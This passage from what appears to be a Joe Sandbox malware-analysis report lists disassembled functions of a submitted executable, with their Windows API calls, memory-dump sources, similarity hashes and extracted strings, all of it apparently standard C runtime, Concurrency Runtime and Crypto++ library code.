                                      • GetLastError.KERNEL32(?,00973539,?,00000000,00000000,00000000,?,00973865,00000006,FlsSetValue,0099F560,FlsSetValue,00000000,00000364,?,00974C4B), ref: 009735D0
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00973539,?,00000000,00000000,00000000,?,00973865,00000006,FlsSetValue,0099F560,FlsSetValue,00000000), ref: 009735DE
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: LibraryLoad$ErrorLast
                                      • String ID:
                                      • API String ID: 3177248105-0
                                      • Opcode ID: ebf23819e17d600f5d5f860db339fc1d5b708b52d7d81f930a20eb88de54e8b7
                                      • Instruction ID: 86bb3101bbbbcb813d5b495368e56beb77ec16271eb810c1183042b58009111e
                                      • Opcode Fuzzy Hash: ebf23819e17d600f5d5f860db339fc1d5b708b52d7d81f930a20eb88de54e8b7
                                      • Instruction Fuzzy Hash: 4001473365A223BBC7214F6C9C45E5BBB9CEF44BA1710C521F90ED7240C724DA04A6E0
                                      Function 00940F50 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                      Download Yara Rule
                                      APIs
                                      • EnterCriticalSection.KERNEL32(009D87E8,?,?,009150EF,009D7168,00992AE0,00000001), ref: 00940F5A
                                      • LeaveCriticalSection.KERNEL32(009D87E8,?,009150EF,009D7168,00992AE0,00000001), ref: 00940F8D
                                      • SetEvent.KERNEL32(00000000,009D7168,00992AE0,00000001), ref: 0094101B
                                      • ResetEvent.KERNEL32 ref: 00941027
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: CriticalEventSection$EnterLeaveReset
                                      • String ID:
                                      • API String ID: 3553466030-0
                                      • Opcode ID: c3b7ebb309519aec8d2a16a2f6160868dcfad83f07bf5f7b6f5d2c2c18dbb1fd
                                      • Instruction ID: 6875d03982d5560dad85b8a067f60a67f6f2ab01b5f6a1ca25ccfc2cc3b4ad21
                                      • Opcode Fuzzy Hash: c3b7ebb309519aec8d2a16a2f6160868dcfad83f07bf5f7b6f5d2c2c18dbb1fd
                                      • Instruction Fuzzy Hash: D9018B31AAD220EBCB149F69FD68D9A37E9EB49301344802BF80287331CB346D44FB80
                                      Function 009440DC Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 009440F5
                                        • Part of subcall function 0094347B: ___crtGetTimeFormatEx.LIBCMT ref: 00943491
                                        • Part of subcall function 0094347B: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 009434B0
                                      • GetLastError.KERNEL32 ref: 00944111
                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00944127
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00944135
                                        • Part of subcall function 00943251: SetThreadPriority.KERNEL32(?,?), ref: 0094325D
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                      • String ID:
                                      • API String ID: 1674182817-0
                                      • Opcode ID: d4b75eb26ed155f64315ab82bd548bb0b8c63756d796307a90c17616ce4145d6
                                      • Instruction ID: efcc5e5342ee8977bcaa6d8c0698a89fbbd7f3f0f06755c2519261bb5ef122ec
                                      • Opcode Fuzzy Hash: d4b75eb26ed155f64315ab82bd548bb0b8c63756d796307a90c17616ce4145d6
                                      • Instruction Fuzzy Hash: B3F0E5B2A083153ADB20F6768C0BFFB369CAF54750F50481AB955F64C6EEA4E90446B0
                                      Function 009431BD Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • RegisterWaitForSingleObject.KERNEL32(0094917E,00955256,75EC5D89,00955356,000000FF,0000000C), ref: 009431D4
                                      • GetLastError.KERNEL32(?,00955356,75EC5D89,00955256,0094917E,?,?,?,?,0094917E,?,?,?,?,00000000), ref: 009431E3
                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 009431F9
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00943207
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                      • String ID:
                                      • API String ID: 3803302727-0
                                      • Opcode ID: d226671508af5bf10038a2f0e87bf5f810c37869cc7237940c20b072cf98d255
                                      • Instruction ID: 4fe2028000f54abd66faa184fbfbf9bd6c956a4c015b4dbf8e7de4eb8bacad27
                                      • Opcode Fuzzy Hash: d226671508af5bf10038a2f0e87bf5f810c37869cc7237940c20b072cf98d255
                                      • Instruction Fuzzy Hash: 5FF0307160810ABBCF10EFB5CD46FAF776CAB04710F608555B626E60A1DA35DB149B60
                                      Function 00942EE2 Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • ___crtCreateEventExW.LIBCPMT ref: 00942EF8
                                      • GetLastError.KERNEL32(?,?,?,?,?,00942729), ref: 00942F06
                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00942F1C
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00942F2A
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                      • String ID:
                                      • API String ID: 200240550-0
                                      • Opcode ID: 46974db9019eab071779059cb1dbf9ffe05c4baba6aa6b1d2e3da8933cdb9cdd
                                      • Instruction ID: 355f6188cfe01f04b769de9a166ef0dce5f038634bd4829e649c30288afc4dcd
                                      • Opcode Fuzzy Hash: 46974db9019eab071779059cb1dbf9ffe05c4baba6aa6b1d2e3da8933cdb9cdd
                                      • Instruction Fuzzy Hash: 76E0206160421526E710F7758D03F7F36EC6B00704FC04454BA15F50C3FD54D90442B1
                                      Function 009430F9 Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00942729), ref: 00943103
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00942729), ref: 00943112
                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00943128
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00943136
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                      • String ID:
                                      • API String ID: 3016159387-0
                                      • Opcode ID: ccef685b5cda47c0b54635d2dcf503b9c6b7028f61725bee2705968e161b4771
                                      • Instruction ID: b7a6033f9515ae9e70115a99141e83d19d62c4192f98c395ea5abd1957ccb90d
                                      • Opcode Fuzzy Hash: ccef685b5cda47c0b54635d2dcf503b9c6b7028f61725bee2705968e161b4771
                                      • Instruction Fuzzy Hash: 3BE04F70A0410AA7CB10FFB5DE4AFAF73AC6A04705F604455A542E2051EB24EB089771
                                      Function 00943251 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • SetThreadPriority.KERNEL32(?,?), ref: 0094325D
                                      • GetLastError.KERNEL32 ref: 00943269
                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0094327F
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0094328D
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                      • String ID:
                                      • API String ID: 4286982218-0
                                      • Opcode ID: 346d73b79fe560e782e221c39044c79d6e288e3febaf801bbfe19028b1f5566a
                                      • Instruction ID: 28650107c54e2f268dc8a2ab016017046937b479aad42cd8b8a037f128b13e4a
                                      • Opcode Fuzzy Hash: 346d73b79fe560e782e221c39044c79d6e288e3febaf801bbfe19028b1f5566a
                                      • Instruction Fuzzy Hash: 88E04F70604119A7CB10BFB5CD46FAF76ACAA00740F408415B526D10A1DB75D6149760
                                      Function 00943317 Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • TlsSetValue.KERNEL32(?,00000000,00948526,00000000,?,?,00942729,?,?,?,00000000,?,00000000), ref: 00943323
                                      • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 0094332F
                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00943345
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00943353
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                      • String ID:
                                      • API String ID: 1964976909-0
                                      • Opcode ID: 68baf3ae18f6a4bce91947180722f423b733c8e4985e62b4faf2978a26a3ebd9
                                      • Instruction ID: 3a3ce495b59b45918180a9f89d22a0302fad339735c9bf401a4f8a7346bae1ec
                                      • Opcode Fuzzy Hash: 68baf3ae18f6a4bce91947180722f423b733c8e4985e62b4faf2978a26a3ebd9
                                      • Instruction Fuzzy Hash: 8DE086705141196BCB10BF76CC06FBF376CAB00741F80C415B915D10B1EF35D6149760
                                      Function 009432BE Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • TlsAlloc.KERNEL32(?,00942729), ref: 009432C4
                                      • GetLastError.KERNEL32 ref: 009432D1
                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 009432E7
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 009432F5
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                      • String ID:
                                      • API String ID: 3103352999-0
                                      • Opcode ID: c649c93f6522da28d51a3dfb40833a2d6408ccca34fa44cba4d2bb4a167df325
                                      • Instruction ID: ee0525ce89dc922f4ba98d4e47665e13517aaa503462de5993b000b993744d91
                                      • Opcode Fuzzy Hash: c649c93f6522da28d51a3dfb40833a2d6408ccca34fa44cba4d2bb4a167df325
                                      • Instruction Fuzzy Hash: 7CE0C270A1810557C710FBB98C4BFBF326CAA00315F508A15F236E14E1EA64EA084660
                                      Function 0092741B Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 322COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog3_GS.LIBCMT ref: 00927422
                                        • Part of subcall function 00925FE4: __EH_prolog3.LIBCMT ref: 00925FEB
                                        • Part of subcall function 00925FE4: std::_Lockit::_Lockit.LIBCPMT ref: 00925FF5
                                        • Part of subcall function 00925FE4: std::_Lockit::~_Lockit.LIBCPMT ref: 00926066
                                      • _Find_unchecked1.LIBCPMT ref: 00927633
                                      Strings
                                      • 0123456789ABCDEFabcdef-+Xx, xrefs: 0092748A
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Lockitstd::_$Find_unchecked1H_prolog3H_prolog3_Lockit::_Lockit::~_
                                      • String ID: 0123456789ABCDEFabcdef-+Xx
                                      • API String ID: 1853221402-2799312399
                                      • Opcode ID: b474cc87fd33b2233a434728835568e830c9392a0befb56b4892dde8bb0c4a62
                                      • Instruction ID: 4d43dafe5957ec37546f7774eca4c5f6735e8bd9f6b047f21599e846dc9e9ad7
                                      • Opcode Fuzzy Hash: b474cc87fd33b2233a434728835568e830c9392a0befb56b4892dde8bb0c4a62
                                      • Instruction Fuzzy Hash: 6DC17F30D092A89EDF11DFF8D450BECFBB6AF55300F184499E885BB24BDA249D45CB51
                                      Function 008FF5A0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 204COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___std_exception_copy.LIBVCRUNTIME ref: 008FF7B2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ___std_exception_copy
                                      • String ID: 0
                                      • API String ID: 2659868963-4108050209
                                      • Opcode ID: a13a3c5b2d967de2e4e559e3fb5d5afd102747df66ced6fe6394ff533f195d95
                                      • Instruction ID: af9a59ce6ffb3dcdedf54f26d3f87290ea9a1acdd836d6a920d4af4c46d0f09b
                                      • Opcode Fuzzy Hash: a13a3c5b2d967de2e4e559e3fb5d5afd102747df66ced6fe6394ff533f195d95
                                      • Instruction Fuzzy Hash: 3371B171D0064DDBDB10CFA9C841BAEFBB8FF59314F14822AE915E7241EB74AA458B90
                                      Function 008FCC30 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMON
                                      Download Yara Rule
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 008FCD9D
                                      Strings
                                      • BlockPaddingScheme, xrefs: 008FCD2D
                                      • StreamTransformationFilter: please use AuthenticatedEncryptionFilter and AuthenticatedDecryptionFilter for AuthenticatedSymmetricCipher, xrefs: 008FCD77
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw
                                      • String ID: BlockPaddingScheme$StreamTransformationFilter: please use AuthenticatedEncryptionFilter and AuthenticatedDecryptionFilter for AuthenticatedSymmetricCipher
                                      • API String ID: 2005118841-3582606076
                                      • Opcode ID: 568f3b30a8341327e021cdc48202bebbda8c00da65d90fbbf0b8e9fbc46833e6
                                      • Instruction ID: f7792187d272052e622d0667ee2321b02a842422dff08e019b62b5dcd3aa1c4a
                                      • Opcode Fuzzy Hash: 568f3b30a8341327e021cdc48202bebbda8c00da65d90fbbf0b8e9fbc46833e6
                                      • Instruction Fuzzy Hash: 6151AE70A01749AFDB15DF68C945BAEBBF4FF45304F10406AE911AB391D7B1AA08CB91
                                      Function 0093736B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 118COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: H_prolog3_ctype
                                      • String ID: %.0Lf
                                      • API String ID: 2548254987-1402515088
                                      • Opcode ID: bdca90d2472b68b86272d1c2562df21149aad618eea61930f42cb77ca2f832f4
                                      • Instruction ID: 1f0ff5f74447d77728360d9991e8163e0ee753f8d9647f6274838796aec6f746
                                      • Opcode Fuzzy Hash: bdca90d2472b68b86272d1c2562df21149aad618eea61930f42cb77ca2f832f4
                                      • Instruction Fuzzy Hash: 1C4176B2D00208ABCF05EFD4D849BDEBBB9FB44300F108948F855AB295DB795959CF90
                                      Function 0093760B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 118COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: H_prolog3_ctype
                                      • String ID: %.0Lf
                                      • API String ID: 2548254987-1402515088
                                      • Opcode ID: 822166e5621f59eea3616b2328f2f8071788e4f7208021ab08d7814031b05ce5
                                      • Instruction ID: f2364720323e2806ff95831e5a5677eb7e23508743bf6e016e4d8fdc9fbc2e9f
                                      • Opcode Fuzzy Hash: 822166e5621f59eea3616b2328f2f8071788e4f7208021ab08d7814031b05ce5
                                      • Instruction Fuzzy Hash: 624187B2D04208ABCF05EFD8CC45BDEBBB9FB04300F104848E855AB2A6DB395919CF91
                                      Function 0095B185 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0095B1AA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: EncodePointer
                                      • String ID: MOC$RCC
                                      • API String ID: 2118026453-2084237596
                                      • Opcode ID: 0e2ad9ad0f529ceb7d1f3b2053d8e162d84bd39bf9d06b74820b7b1f5bbd4add
